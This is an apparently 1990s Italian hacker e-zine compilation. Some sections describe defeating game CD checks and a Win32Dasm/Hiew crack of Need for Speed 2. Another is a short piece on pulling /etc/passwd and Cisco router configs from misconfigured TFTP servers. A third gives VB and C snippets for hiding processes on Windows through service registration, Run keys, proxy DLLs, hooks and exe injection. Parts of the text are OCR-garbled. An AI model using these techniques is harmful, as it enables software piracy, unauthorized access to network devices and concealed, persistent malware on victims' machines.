p.s. se volete far funzionare i nude patch del suddetto gioco dovete usare per forza la procedura sopra 
descritta. 


6) CD-CHECK CHE SI FREGANO CON VIRTUAL-CD 


Questo programma secondo me è mitico perchè riesce a fregare molte delle protezioni esistenti. 

I giochi che si possono fregare con questo programma sono tantissimi quindi cercate di procurarvelo. 
Come funziona? Be è semplicissimo, basta lanciare il programma inserire il cd da "craccare" e al resto 
pensa tutto lui! Praticamente il programma compatta in un unico file tutto il contenuto del cd e quando 
noi vogliamo giocare con il gioco in questione mi basta lanciare il virtual cd cliccare sul gioco 
desiderato e via! 

Come ho già detto poche righe sopra secondo me questo programma è quello che da più soddisfazioni 
dal punto di vista di pratico in quanto si riescono a craccare moltissimi giochi ci sono però dei contro: 
- per fare funzionare i giochi in questione io devo usare sempre detto programma 

- il programma mi fa una sorta di immagine dell'intero cd includendo quindi anche cose che a volte 
possono risultare inutili tipo i demo o le directx e io non le posso eliminare e ciò causa occupazione di 
spazio su HD del tutto inutile 

- funziona solo sotto windows 95 


7) FREGHIAMO IL CD-CHECK TRAMITE IL REG EDIT DI WINDOWS 
95 


Secondo me regedit (lo trovate all'interno della dir di windows 95) è uno degli strumenti più belli di 
windoze, ci si possono fare un sacco di cose, ma vediamo come usarlo per provare a saltare qualche cd- 
check (se non ricordo male funziona con Diablo tra gli altri) 


Allora lanciamo il reg edit andiamo in: 

HKEY_LOCAL _MACHINE 

e successivamente in: 

SOFTWARE 

Guarda che bello ci sono tutte le marche dei vari giochi che ho installato sul mio picci (naturalmente 
stiamo parlando di giochi che funzionano solo per windows 95, e che facendo l'installazione, vanno a 
modificare questa sezione del file di registro). Che faccio io? 

Be semplice vado a cercare fra i vari software il mio gioco e do un okkiata ai "Dati". Se sono tanto 
fortunato da trovare Cd_Path o roba simile lo vado a modificare in maniera alquanto agile. Ci siamo 
capiti no? Chiudo regedit e provo a lanciare il gioco. Questa procedura a volte è sufficiente molte altre 
volte no. 


Prima di passare alla parte 2 un po' di consigli: 

- mi raccomando controllate che tutte le parti del cd siano installate (potete evitare di copiarvi le directx 
e i demo inclusi spesso nei cd) 

- i metodi sopra elencati funzionano si ma solo a volte, cosa saggia sarebbe lavorare di debugger 
(leggetevi la guida di xoanon 

- se proprio non riuscite a afre nulla masterizzatevi il cd o provate a chiedere in giro il crack (trovare 
crack per giochi è molto difficile, fate prima a chiedere dell'eseguibile magari) 

- mi raccomando quando modificate i file di cfg o simili fate sempre una copia di riserva 

- so che molte cose non sono spiegate bene, ma cercate di capirmi molte delle sprotezioni spiegate 
sopra con un po' di pratica e culo non necessitano di ulteriori spiegazioni 

- in molti casi occorre usare un po di cervello 

- sicuramente potrete avere più soddisfazioni usando il programma virtual cd (ultimamente sproteggere 
i giochi è più duro di una volta!) 


PARTE 2: "RIPPIAMO IL CD?" 


Cosa vuol dire "rippare?" be in parole povere, molto povere, vuol dire eliminare parte dei giochi che 
sono inutili e che okkupano solo spazio su hard disk. Quali sono queste parti? Be di solito tutti i 
maggiori gruppi tendono a rippare quelli che sono i filmati, le musiche (solo se in formato wav), le 
direct x, i demo o i filmati dimostrativi che sono contenuti all’interno dei cd, i vari linguaggi (di solito 
si lascia solo l’inglese) ecc. 

Una volta rippato il gioco generalmente viene compresso usando programmi tipo il pkzip o il rar, 
suddividendolo in vari dischetti da 1.4 mega per una eventuale archiviazione. 

Quando io copio il mio gioco su cd per “craccarlo” già posso sin da subito eliminare le direct x e i vari 
demo o filmati inclusi nelle subdirectory che non riguardano il gioco vero e proprio. 

Una volta che il gioco sta su hard disk provo inanzitutto a saltare il cd-check con uno dei modo sopra 
elencati dopo di che passo a ripparlo. Molti giochi al loro interno hanno dei menu che consentono di 
eliminare la musica dal gioco i filmati, attivando queste opzioni, salvando la configurazione, io potrò 
già tranquillamente eliminare i filmati e le musiche wav (riconoscerli non è difficile, di solito sono 
contenuti in apposite sottodirectory con nomi tipi Video, Music, Sound, e poi generalmente okkupano 
decine di mega). 

Se i giochi in questione non presentano tali opzioni al loro interno posso utilizzare vari sistemi (nel 
90% l’opzione musica abilitata/disabilitata è presente quindi prendero’ in considerazione vari sistemi 
per rippare i filmati): 


- cancellare i vari file di filmato e provare a lanciare il gioco senza di questi 

- cancellare i filmati e creare dei file di lunghezza 0 con stesso nome e estensione di quelli reali 

- cancellare i vari file, tenere solo quello che okkupa il minor numero di K e fare varie copie di 
questo cambiandogli però nome con quelli dei vari file che abbiamo cancellato 

Stesso discorso può valere per le musiche in wav, o i dialoghi presenti all’interno dei giochi. 

Ripeto che comunque molti giochi al loro interno hanno le opzioni per disabilitare queste cose 

quindi... 

Be credo che sia tutto. 

Il gioco lo avete sprotetto, le cose in più le avete eliminate, non vi resta che zippare i vostri giochi... 

Vi assicuro che avrete molta soddisfazione. 


PARTE 3: USARE IL GAME WIZARD 32 PRO PER SPROTEGGERE 
I GIOCHI BY CAVALLO. 


Eh si', sono riuscito a infilarmi anche in questa guida, spero che non dispiaccia a nessuno !!! 
Andiamo ad ANAL-izzare :-) il funzionamento del Game Wizard 32 Pro 3.0, molto utile x poter 
cheatare con i giochi ma piu' che questo mi interessa una sua applicazione diciamo piu' 
cattiva; illustro comunque i possibili utilizzi del suddetto programma (che per chi non lo 
sapesse gira sotto DOS): 


GW permette di cercare nella memoria dei particolari valori che ci servono (es. Munizioni, Vita etc..), 
settarli al valore che desideriamo, "freezarli" cioe' bloccarli su un dato valore, salvare frame (immagini) 
del gioco che ci interessa, editare manualmente la memoria Ram, salvare la situazione totale della 
memoria del gioco che ci interessa cosicche' saremo in grado in futuro di ritornare nella stessa 
situazione di gioco (utile per i giochi che non permettono di salvare la posizione ma ATTENZIONE, se 
salvate tutta la memoria per es. 16mega, vi ritroverete un file di dimensioni considerevoli sull' HD!) e 
altre cosette tipo un File Manager integrato, la possibilita' di bloccare il PC con una password 
antisgamo e di poter crashare al Dos in caso di impasto del computer (cosa non molto rara...), e infine 
settare la velocita' dei giochi (utile con quelli vecchi che sui PC moderni sgheggiano troppo e fanno 
cagare). 


La versione Professional del GW permette di effettuare ricerche in 3 modalita': 

Basic / Intermediate / Advance 

e su 5 Range di Memoria : 

Conventional / 4 Mb / 8 Mb / 16 Mb / Max 

Tralasciando i range di memoria (anche se consiglio 4/8 Mb) focalizziamo la nostra attenzione sulle 
modalita' che riassumerei cosi! : 


Basic : ricerca i valori proprio come li avete messi cioe' se io metto 5 allora il GW pensa "Cazzo, 
questo qui vuole proprio il valore 5" e ve lo cerca paro paro nella memoria (quanta ne avete scelta nel 
range); questa opzione va bene per valori fissi come Munizioni, Vite, Cuoricini, Pompini etc... 


Intermediate : ricerca i valori "approssimandoli"; diciamo che io lo utilizzo su base percentuale (non so 


se dice 25 e poi 50 e poi 100 intende dire che l'ultimo valore e' circa 4 


volte il primo e 2 volte o' secondo". Consigliato per cercare valori tipo Barra di Energia e simili.. 


Advance : detto anche dai matematici "metodo Cartesio" : ricerca solo permanenze e variazioni dello 
stato mentale di Cavallo, no volevo dire della memoria permettendo cosi' di andare a cercare le cose 
piu' disparate (e' un po' un casino da usare) 


"Si ma cazzo non ci hai ancora detto come si usa sto cazz'i'programma.." Ok, un momento, arrivo al 
dunque: 


Il programma e' un TSR (Terminate & Stay Resident, minchia come sono bravo!!) cioe' resta residente 
in memoria aspettando che voi lo chiamate premendo il tasto \ quello di fianco all' 1 sopra al TAB, la 
backslash o com'o'cazz'se chiama. Una volta chiamato scegliete la 1ma opzione, e il tipo di ricerca e 
cercate quello che volete, poi ritornate al gioco, lo usate, richiamate il GW e cercate il valore ancora 
dicendo che valore ha (nel beginner e nel intermediate) o se e' cambiato o meno nell' Advance. 

Non basta fare questa procedura una volta sola in quanto il GW "filtra" la memoria volta dopo volta e 
quindi bisogna iterare la procedura (n-r)\ò volte (ehm, scherzo, intendo dire un po' di volte) x trovare 
lo/gli indirizzo/i esatti. 

P.S. Come penso avrete capito piu' avanzate con il livello di "penetrazione mnemonica" (beg->int- 
>adv) piu' tempo ci vuole a trovare gli indirizzi esatti. 


Comunque il programma ha un bel tutor x imparare ad usarlo quindi mi sono gia' fin troppo rotto le 
palle di star qui a spiegarvi come funziona il GW. 


Ora vi spiego un bell'utilizzo che ho fatto del GW nell'evitare il classico rompimento di coglioni del 
giocare con i Demo; prendero' 2 esempi molto simili (anche xche' lo ho fatto con questi e basta!!): 
NBA Live '95 e Fifa '97 : 

io mi domando e dico : "Ma perche' diavolo devo giocare solo 1 o 2 minuti a un gioco per provarlo? 
StoCazzo ! io ci voglio giocare fin quando mi pare !!!" 


Infatti Nba Live '95 (lo so un po' vecchietto ma penso si riesca anche con la 97 e magari con la 98) : 
limite di tempo 2 tempi da 1 minuto (cazzo ma si puo' uno inizia a giocare e gia' scattano i secondi). 
Ma anche Fifa '97 , 1 solo tempo da 2 minuti, che merda e' ? 

Ecco quindi che il prode Cavallo parte col suo fido GW232 in sella ad eliminare le fetide limitazioni : 
dopo un inutile tentativo con l'advanced mode sono giunto alla constatazione che settando una bella 
ricerchina intermediate ce la si cava con scioltezza: nel caso di Nba Live basta settare come ricerche il 
minuto di partenza come 100 (%) a 30 secondi stoppate e mettete 50 (%) e alla fine 0, ripetete un po' di 
volte, magari inframezzando con varianti tipo 75(%) o 25(%) rispettivamente a 45 e 15 sec. 
Smanettando un po' cosi' arriverete ad avere mano a mano sempre meno indirizzi, quando ve ne restano 
solo 3-4 potete usare l'opzione per importarli direttamente (non ricordo come si chiami, e non ho voglia 
di star qui a cercarla) nella Table of Memory Locations 

dove potete cambiare il valore o freezarlo , io consiglio di salvare la tabella con un nome, farvi un bel 
batch file che chiami il gw e poi il demo del gioco, cosi' appena parte la partita dimostrativa (occhio la 
partita, non il demo !!) premete il tasto backslash e andate su table of.. loadate la tabella prefatta e 
settate il tempo a quello che volete (non ricordo che base strana usi il gioco, fate un po' di prove). 
Lascio ai fidi lettori :-) come esercizio la semplice ricerca dei falli e/o dei punti delle 2 squadre (non 
oso pensare se si possa taroccare qcos'altro, fatemi sapere !!). Per Fifa'97 il discorso e' lo stesso, l'unica 
cosa che essendo un gioco di calcio (ma va') il tempo va da 0 a 2:00 quindi dovete settare 0 a 0:00 e 


100 a 2:00 e quindi il taroccos viene piu' smarzo xche' le alternative sono o bloccare il timer o 
riportarlo indietro quando volete (e piu' bello il lavoro con Nba, fidatevi, si setta il tempo all'inizio del 
tempo e poi si gioca..) 


Visto che sono buono vi do anche gia' gli indirizzi di memoria : 


Nba Live '95 Time : BYTE *00232D31 
Fifa '97 Time :BYTE *00277784 


Per falli o altre cose divertitevi voi (nel senso buono, non e' un invito all'omosessualita' :-)) !!! 


NOTE: 

Tutti gli errori di itagliano, tutti gli orrori ortografici, tutte le cazzate dette nelle Parti 1 e 2 sono 
copirait del Dr. Slump. Quindi se su questa guida ritenete che ci siano scritte troppe cazzate 0 
che usando uno dei metodi sopra elencati fate qualche cazzata, che vi devo dire: STI CAZZI 
Bel discorso del cazzo questo no? 

Non so se l’illustre Cavallo si associerà con queste note ma conoscendolo... 


Più alcolico che mai Dr. Slump 


Soggetto : TFTP, Trivial File Transfer Protocol 
Porta : 69 UPD 


Caratteristiche : Serve per avviare dispositivi di rete (es. router) o per il 
boot di postazioni prive di disco. 


Uso: Se non configurato in modo corretto si puo utilizzare il seguente 
protocollo per trasferire i file /etc/passwd sul proprio sistema, utile 
per avere l'elenco dei nomi utente (per un eventuale brute forcing ) e 
nel caso in cui non venga utilizzato etc/shadow pure dei hash delle 
password ! Eventualmente da questo (sempre tramite il download) si 
possono ricavare informazione utili appunto sui router... 


Download via TFTP del file di configurazione Cisco 
ANNNNNNNANANAANANAN ANA ANANANAANNANNANANNANNNNNAANNNN 


Sfruttare TFTP per scaricare i file di configurazione puo essere molto 
semplice se il sysadm non ha attivato qualche filtro che impedisca l'accesso 
al TFTP o ha usato nomi banali per il file .cfg . Spesso porta lo stesso nome 
del relativo DNS. 


Esempio (ip e dns inventato) : 
Ip: 144.145.146.147 


Facciamo na ricerca DNS e scoprimo che corrisponde a : tampax.132.rtr 
Quindi facciamo: 

[root@pizza] tftp 

> connect 144.145.146.114 

> get tampax.132.rtr.cfg 


> quit 


Questo file conterra' probabilmente i vari nomi comunita' ed eventuali liste 
di controllo degli accessi. 


Ok, la prossima volta parlero meglio dei router Cisco, bye... 


Tecniche di mascheramento di un processo, ossia come fare eseguire del codice 
senza che lo si veda. 


Premessa: 


prima di tutto vorrei fare una premessa quasi teorica per capirci nel resto del 
testo. 

Cercherò di non essere troppo tecnico, me ne scusino i super esperti, non 
fustigatemi troppo forte non sopporto il dolore. 

Il testo è marcatamente orientato all'ambiente Windows, mi perdonino i 
possessori di Linux & affini, parte del discorso vale anche per loro, ma solo 
una minima parte. 


PROCESSI 


PROCESSO, cosa è ? 

Un processo è un programma in esecuzione. 

Quando create un programma (un exe per semplicità) con il vostro compilatore 
preferito, create una immagine binaria rilocabile, cioè caricabile in memoria 
ad un indirizzo non prefissato. 

Per i puristi lo so, lo so che i file .com non sono rilocabili, ma vi ricordo 

che stiamo parlando di Windows. 


Quando viene fatto il doppio click sull'icona l'immagine viene caricata in 
memoria (dal loader o dispatcher del O.S.) vengono create tutte le strutture 
dati necessarie al O.S. tra cui il PID o process Identification e quindi messa 
in coda di attesa fino a quando la CPU la degna di attenzione. (cioè la esegue) 
Per vedere il PID se avete NT vi basta fare CTRL-ALT-DEL avviare il 
Task-manager, e selezionare il tag processi, in 95 boh non lo ricordo. 


Il programma a questo punto si chiama processo. 
Ma non pensiate che le cose sono così semplici: ci rimangono ancora da parlare 
di thread e OLE IN-PROCESS e OUT-PROCESS. 


L'importante da sapere a questo punto è che il nostro codice ha il suo SPAZIO 
DI PROCESSO e gira li dentro 

Ossia è come una scatola chiusa gli altri processi non vedono i suoi dati e lui 
non può leggere/scrivere i dati di altri processi. 

p.s.: please evitate commenti sulla meravigliosa e stabile gestione dei 
processi di WinZoZZ he he, vi ricordo che anche se ci ha messo circa 10 anni 
anche Microsoft è riuscita a fare un prodotto come NT, 

della serie almeno uno sguardo a Minix lo si poteva dare, ma tutto sommato 
..meglio tardi che mai ;-) 


THREAD: 
Un processo poi può essere scritto in modo da essere suddiviso in tanti piccoli 
"processini" che però condividono 


Lo spazio di indirizzamento (fondamentalmente i dati), le strabilianti 
funzionalità di multitasking di Windows permettono di mandare in esecuzione non 
un processo per volta ma un thread per volta, 

es.: se il processo A crea tre thread A-1 A-2 A-3 e il processo b crea B-1 E 
B-2 

il O.S. a turno dà a tutti e 5 thread un "time slice" ossia una fettina di 

tempo di CPU: e se A-2 è in attesa che l'utente digiti qualche cosa alla 

tastiera o un dato dalla seriale, viene messo in attesa e gli altri 4 thread 
continuano a girare felici e contenti. 

E qui evito volutamente, che non è il caso, di trattare la differenza fra 
Windows 95/98 e NT, dico solo che NT ha il multitasking preemptive, ossia è 
esattamente come ho detto prima, mentre 95 ha il multitasking non preemptive 
(detto anche cooperativo) ossia se un thread è in attesa o è inchiodato o è 
scritto con il ...bip può bloccare tutto il O.S. 

(nota di Bacco: si riesce a inchiodare anche NT, io ci sono riuscito con un 
thread di priorità TIME-CRITICAL) 


OLE COM e amenità simili: 
di queste cose ne parliamo dopo, per ora è sufficiente sapere che una volta 
caricati diventano o processi o threads di un processo già esistente. 


Ora mi riferirò ai processi ma la cosa vale tranquillamente anche per i 
threads. 


Generalmente un processo in Windows crea una o più finestre e per default 
"lascia il segno" nella task-bar, alcuni processi possono poi mettere una 
iconetta nel tray vicino all'orologio, ma noi cerchiamo di nascondere l'exe non 
di renderlo più visibile, quindi non consideriamo questa funzionalità che 
andrebbe fatta apposta. 


Ogni finestra possiede: 

un ID che è il suo Handle - il nome con cui chiamarla - 

la Caption: ossia il nome che si vede nella barra in alto 

una classe di appartenenza, 

altri parametri. 

Se volete "spippolare" su questi dati vi consiglio spy++ è una utility fornita 
con il VisualStudio davvero carina 


Ora non ci rimane che parlare di Servizi. 
SERVIZI 


Un processo si può strutturare come eseguibile ossia va lanciato a manina (tipo 
doppio click) e se si fa il log-out al sistema tutti i processi vengono 

terminati. 

Un servizio, è leggermente diverso, innanzitutto va registrato nel sistema 

ossia bisogna dire al SCM (ServiceControlManager che fa parte del O.S.) che 
esiste anche lui. 


ossia viene creata una entry nel registry (spero sappiate cosa è il registry, 

altrimenti ....trovatevi un articolo) e viene automaticamente caricato quando 

parte il sistema, anche se nessun utente si è loggato al sistema. 

Se un utente fa il log-out il servizio rimane attivo. 

Se premete CTRL-ALT-CANC non lo vedrete nella lista dei task; eh per forza, non 
è un task è un servizio !!! 

Se però il servizio crea delle finestre, con spy++ potrete saperne l'handle o 

gli altri dati. 

Normalmente i servizi NON hanno interfaccia utente, esempio: Wingate (nel senso 
del gatekeeper), IIS, PWS girano tutti come servizi, 


Per quanto ne so i servizi sotto NT e w9x sono diversi: 

su NT per fare le cose bene si crea il servizio come file dll e si scrive un 

exe o un cpl (icona del control panel) che si interfaccia con il SCM Usando le 
API CreateServices() StartService(), e altre, 

su w9x il SCM è più semplice e fare un servizio è meno complesso. 

Ci sono due strade: 


1. fare diventare un processo un servizio; in questo modo si fa sparire il 

processo ma in se si riavvia la macchina questo deve essere riavviato e l'API 

da usare è la RegisterServiceProcess() 

(p. s. non ho mai provato se funziona anche su NT) 

2. registrare nel sistema il processo come servizio usando una chiave del 

registry: 
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunService 


Bene gente ora viene la parte strana, e poi gli esempi. 

OLE Automation Servers: 

OLE è una cosa che Bill] ha inventato perché l'informatica era troppo semplice, 

e lui (che invece di trombare le stagiste come il suo omonimo) piace incasinare 

il mondo dell'informatica ha creato nuovi tipi di interazione fra processi. 

OLE un tempo voleva dire Object Linking and Embedding ora NON vuole più dire 
nulla ! e si basa su un'altra interfaccia (tanto ce n'erano poche in giro) 

chiamata COM (Component Object Model) e qui mi fermo perché anche le mie 
conoscenze cominciano a perdersi. 


OLE Server è praticamente un processo o un o o più threads che esportano delle 
funzionalità a chi le richiede: 

Quando si mette un grafico excel in un doc Word, vedrete che, cliccando sul 
grafico, word si trasforma e prende i menù di excel. 


OLE Server: sono di due tipi 

IN-PROCESS: hanno la forma di dll, ocx e quando vengono caricati girano nello 
spazio di processo del programma chiamante. 

OUT-PROCESS: sono degli exe e possono rispondere ad altri programmi se questi 
li chiamano (Excel, Word, Iexplorer) o vivere da soli e come qualunque normale 
eseguibile. 


La grossa differenza è che si creano il proprio spazio di processo ! 
(se non mi sbaglio anche quando girano embedded chiamati da un altro exe) 


in ogni caso per essere visti come OLE SERVER devono essere registrati, e 
quindi avranno la loro bella chiavetta nel registry. 
Cioè il CLSID: cioè quella incomprensibile spataffiata di cifre esadecimali. 


Bene gente se avete resistito fino a qui vi siete meritati la lista dei 
possibili modi per fare girare del codice in maniera più o meno invisibile: 
(ma non pensate che il brutto sia completamente passato hi hi hi ) 


THE GHOSTS 


1) Eseguibile 

2) Servizio 

3) Driver Virtuale Vxd 

4) DII cuscinetto 

5) Subclassing 

6) hooks 

7) shell extension 

8) Iexplorer helper o Netscape plug-in 
9) Embedded Exe 


Vediamo una panoramica, su come funzionano. 

1) è un normale eseguibile si può quindi creare con qualsiasi ambiente di 
sviluppo la cosa particolare è quella di renderlo invisibile alla task list e 
non farlo vedere nella barra di avvio. 


Un metodo è quello di fare girare il programma come se fosse un servizio 


Eccovi per regalino del nostro benamato Master il codice in VB per la soluzione 
uno, per i C-isti, beh guardatevi il codice, mi sembra davvero una offesa 
morale tradurvelo. 


Public Declare Function GetCurrentProcessId Lib "kernel32" () As Long 

Public Declare Function GetCurrentProcess Lib "kernel32" () As Long 

Public Declare Function RegisterServiceProcess Lib "kernel32" _ 
(ByVal dwProcessID As Long, ByVal dwType As Long) As Long 

Public Const RSP_SIMPLE_SERVICE = 1 

Public Const RSP_UNREGISTER_SERVICE = 0 


' Le due funzioni -------------------------- 


Public Sub nascondi() 
Dim identificatore As Long 
Dim registrazione As Long 
identificatore = GetCurrentProcessId() 


registrazione = RegisterServiceProcess(identificatore, _ 
RSP_SIMPLE_SERVICE) 
End Sub 


Public Sub rivela() 
Dim identificatore As Long 
Dim registrazione As Long 
identificatore = GetCurrentProcessId() 
registrazione = RegisterServiceProcess(identificatore, _ 
RSP_UNREGISTER_SERVICE) 
End Sub 


2) Servizio: il servizio di per sé è già piuttosto invisibile, non compare 

nella Task-list non ha icone, 

i servizi però vanno registrati nel Registry, in modo che partano 

automaticamente ad ogni avvio del sistema 

sul mio NT si trovano HKEY_LOCAL _MACHINE\SYSTEM\ControlSet001\services 
ma la procedura per crearli non è proprio banale. 

Su WO9x e penso anche su NT si può usare la chiave del registry e metterci il 

vostro eseguibile 
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunService 


Se poi avete il MSVC create un nuovo progetto di tipo ATL e buona parte dello 
scheletro per creare un servizio ve lo crea lui 


3) un driver virtuale è un programma con un header speciale, non necessita di 
registrazione, ma va comunque installato o nel registry o in qualche .ini 
generalmente system.ini. 

Per creare un VXD bisogna usare il DDK della Microsoft. Non chiedetemi di più 
xè non ne so. ;-( 

4) DII cuscinetto: supponiamo di voler nascondere una dll a caso winsock32.dll, 
l'idea è quella di creare una dll che nella export table abbia le stesse 

funzioni della winsock32.dll e rinominare l'originale in _wsock32.dl] (o un 
qualunque nome vi piaccia) e poi nella vostra winsock32.dll per le funzioni che 
volete ridefinire chiamate il vostro codice e poi la dll originale: es. 


MyFunc(); 

(*Send)() //ossia la send della dll originale 

} 

ovviamente la DI originale deve essere stata preventivamente caricata con x 
es. la LoadLibrary("_wsock32.dll") 


5) Subclassing è una tecnica per modificare il comportamento di una finestra. 
Se usate il VC con le MFC l'API è la CWnd::SubclassWindow() se preferite usare 


le W32 API o il VB 

L'API è la CallWindowProc() 

In questo modo quando una finestra riceve un messaggio, questo viene prima 
inviato alla vostra procedura e poi alla finestra originale, se volete, se no 
potete rubargli il messaggio e basta. 


6) HOOKS con gli hooks è possibile attaccare una "funzione di callback" ad un 

certo messaggio di windows 

Al messaggio che volete voi agganciate la vostra funzione in modo che questa 

venga chiamata per prima 

È possibile fare una lista di hooks ossia di procedure che vengono chiamate 

quando in Windows viene generato un messaggio: 

i messaggi a cui agganciarsi sono per es: WH_KEYBOARD, WH_MOUSE, WH_GETMESSAGE, 
e molti altri 


e qui il regalino ve lo fa Bacco (cioè io) con un pezzo di codice ...in C. 


la funzione installa un HOOK ai messaggi che il thread (di identificativo 
dwThread) riceve 
e lo aggancia alla funzione GetMsgProc() 


VITTTTTTITTTITITITT TITTI TITTI TITTI TITTI TI TITTI, OTT TIZI TTI T TTI TITITTTZZIZIZIZ0Z] 
BOOL WINAPI SetHook(DWORD dwThreadId) { 
BOOL fOk = FALSE; 


// Install the hook on the specified thread 
g_hhook = SetWindowsHookEx(WH_GETMESSAGE, GetMsgProc, g_hinstDIl, dwThreadId); 


return(fOk); 
} 


LRESULT WINAPI GetMsgProc (int nCode, WPARAM wParam, LPARAM IParam) 
{ 

Beep(2000, 1000); 

return(CallNextHookEx(g_hhook, nCode, wParam, lParam)); 

} 


AILTLLLII TITTI LTT ITAL TITTI LILLA TTD LL TITTI LL LDL TIT TITT LDL TITTI 


7) Shell Extension 

Ringrazio il nuovo SPP-adepto Devil che alla velocità della luce ha scritto il 
codice, che qui posto solo a pezzi anche perché troppo lungo per lo scopo di 
questo articolo. 


Windows prevede la possibilità di aggiungere delle voci ai menù a tendina che 
si apre quando cliccate con il tasto destro su un file nella finestra 
dell'explorer (tipo WinZip , antivirus vari) 


Per fare questo bisogna creare un OLE server che può essere nella forma di dll 

e credo anche exe e 0cx, 

i passi da seguire sono vari: 

1. si deve registrare il CLSID dell'oggetto, le chiavi da registrare dipendono 

dal comportamento che dovrà avere il nostro OLE Server, va comunque creata la 
voce HKEY_CLASSES_ROOT\CLSID\{CLSID del mio OLE server} 

e questo può essere fatto nella funzione STDAPI DI|RegisterServer(void) se 
l'oggetto è una dll o nel main o dove vi pare, basta farlo 

2. dovete anche mettere anche le funzioni 

DIICanUnloadNow(), and DIIGetClassObject() 


STDAPI DIlCanUnloadNow(void) 
{ 


} 


return S_FALSE; 


STDAPI DIIGetClassObject(REFCLSID, REFIID, LPVOID *) 
{ 

Beep(600, 200); 

return CLASS_E_CLASSNOTAVAILABLE; 
} 


8) Plug-in e helper 

Molto brevemente anche perché non mi sono mai addentrato nell'argomento, è 
possibile con i SDK appositi creare delle estensioni a Iexplorer o Netscape che 
permettano di fare eseguire del vostro codice ai browser, normalmente vengono 
usati per vedere tipi di dati particolari tipo RealAudio o filmati, ma nulla 

vieta di fargli fare tutt'altro 

Se volete un dettaglio su come fare, beh vi rimando ad un prossimo numero di 
NetRunner, 

non vorrete mica sapere tutto adesso !!!! 


9) Embedded Exe 

Questa è la tecnica fondamentalmente di alcuni tipi di virus: si "iniettano nel 
file eseguibile e spostano il puntatore alla prima istruzione facendo in modo 
che punti al proprio codice eseguibile, una volta che questo è terminato c'è un 
jump alla prima istruzione del vecchio eseguibile che a questo punto parte 
regolarmente come al solito. 

Su questo argomento direi che la letteratura è fin troppo vasta. 

E poi noi SPP siamo profondamente contrari alla creazione di virus e affini, 
hacking deve essere costruttivo NON distruttivo. 


Bene gente dopo questo pensiero moralistico, il vostro Bacco vi saluta sperando 
di essere stato utile e soprattutto di non aver scritto troppe cazzate he he he 


Ciao a tutti :) :-) 


OSTOSFIN 


NANI 


SMALTO AAA 


Quindi vuoi essere un crackatore, huh?Aha. So cosa pensi. Pensi scarico chili di help sui 
crack da internet, li leggo e comincio a crackare, huh ? Poi mi chiamo CdKiller e divento 
famoso come ogni altro crackatore sulla rete hun ??NO!!!TUTTO QUELLO CHE HAI 
PENSATO SUL CRACKARE E‘ FALSO!!!DIMENTICALO!!!RIPULISCITI IL CERVELLO E TI 
INSEGNERO' COME CRACKARE!!! 

Quando avrai finito di leggero questo documento saprai come crackare le protezioni dei CD e 
come disabilitare le chiamate a filmati/sonoro/musica negli exe dei giochi. 


COSA SERVE PER CRACKARE 


Ok prima di cominciare a crackare hai bisogno di un disassemblatore! lo uso Win32Dasm e penso che sia il 
miglior programma per un apprendista crackatore. 

Poi hai bisogno di Hiew per manipolare gli exe che vuoi crackare perché con Win32Dasm puoi solo guardare 
negli exe ma non puoi cambiare niente. 

Win32Dasm 

Hiew 

Devi diventare pratico di questi due programmi per riuscire a crackare i programmi. 

Ok, prendiamo per buono che hai i programmi e cominciamo a crackare. 


SI COMINCIA!!! 


Crackare con Win32Dasm 

Ok in questa lezione ti mostrerò come lavorare con Win32Dasm e Hiew. 

Oggi vogliamo crackare un gioco molto facile da crackare. Crackeremo Need for Speed 2. 

Ok. Lanciamo Win32Dasm.exe.Possiamo vedere la schermata principale e la toolbar. Clicchiamo su 
Disassembler. Un menù appare e possiamo vedere delle opzioni. Clicchiamo su Open file to Disassemble. Un 
altro menù ci mostr il nostro HD e possiamo selezionare l’exe da crackare(ecco nfsw.exe).Il processo di 
disassemblazione può prendere alcuni minuti(cerca di avere almeno 80Mb liberi su disco o l’exe potrebbe non 
essere disassemblato totalmente). Ok, l’'exe è disassemblato. E ora? 

Tutto quello che vedi è un testo scritto col font Windings?NESSUN PROBLEMA!!! 

Clicca su Disassembler e sulla schermata di opzioni seleziona Font e poi Select Font. Ora puoi selezionare il 
font da visualizzarepenso che il miglior font per lavorare sia Arial). Clicca Ok. 

Ora possiamo leggere iltesto.Ok.Ma cosa diavolo vuol dire? 

Object01: Begtext RVA: 00001000 Offset: 00000400 Size: 000AEA00 Flags 60000020 

Cosa significa?Non lo sappiamo.Ma non importa!Non abbiamo bisogno di saperlo.Quello di cui abbiamo 
bisogno è di lanciare il gioco(Need for Speed 2) senza il CD inserito. Non funziona hun?PORK!Ma che 
messaggio di errore da? 

Messaggio di errore: 

To play Need for Speed 2 you need the Cd 


Ok.Ora sappiamo il messaggio di errore!Questo è molto utile!Torniamo al Win32Dasm (nfsw.exe è già 
disassemblato), clicchiamo di destro sulla toolbar sul pulsante String Data References (è il pulsante dopo quello 
di stampa).Si apre una finestra chiamata Win32Dasm List of String Data Items. Ok. Tutto quello che dobbiamo 
fare è cercare il messaggio di errore che abbiamo visto lanciando Need for Speed senza il CD (per giocare a 
Need for Speed è necessario il CD). Cominicia per T per ,To Play“ quindi non cerchiamo dall'inizio ma 
saltaiamo alla sezione dove vediamo messaggi che cominciano per ,T“. Ed è lì che troviamo il messaggio di 
errore ,, To play Need for Speed 2 you“. Doppio click sul messaggio. Chiudiamo il menu pop-up con il messaggio 
di errore e torniamo alla schermata principale di Win32Dasm con il testo di nfsw.exe. Possiamo vedere che non 
siamo più all’inizio del testo ma in un qualche punto nel mezzo. Siamo ora esattamente nel posto dev'è il 
messaggio di errore. Vediamo ancora parole varie e non sappiamo cosa significa. Ma l’unica cosa che ci 
interessa di sapere e il numero di @offset di ogni comando di chiamata(call) o di salto(jump) (jump=jmp call = 
call). Guardiamo un attimo allo schermo e vediamo un comando di jump: 

:0044632C EB1BC5E3E1 call 00446349 


Usiamo i tasti cursore per cliccare sul comando jump. La Opbar cambia il suo colore in verde. Questo significa 
che possiamo manipolare il testo(possiamo modificare ogni cosa nell’exe, ma la barra verde ci segnala comandi 
importanti come jump,call...). Lasciamo la barra sul comando jump e guardiamo sotto la barra, dove vediamo 
alcuni numeri: 

Line:120246 Pg 1604 of 4273 Code Data @:0045821 @Offset 00045821h in file:nfsw.exe 


La sola cosa che ci interessa è il numero dopo @Offset (qui è 00045821), non abbiamo bisogno dell’ultima h. 
Ci segnamo il numero(00045821) e chiudiamo Win32Dasm. 
Ora andiamo con Hiew. 


Crackare con HIEW 

Lanciamo Hiew.exe(h.exe/h95.exe).Possiamo vedere la lista dei programmi e degli exe nella directory di HIEW 
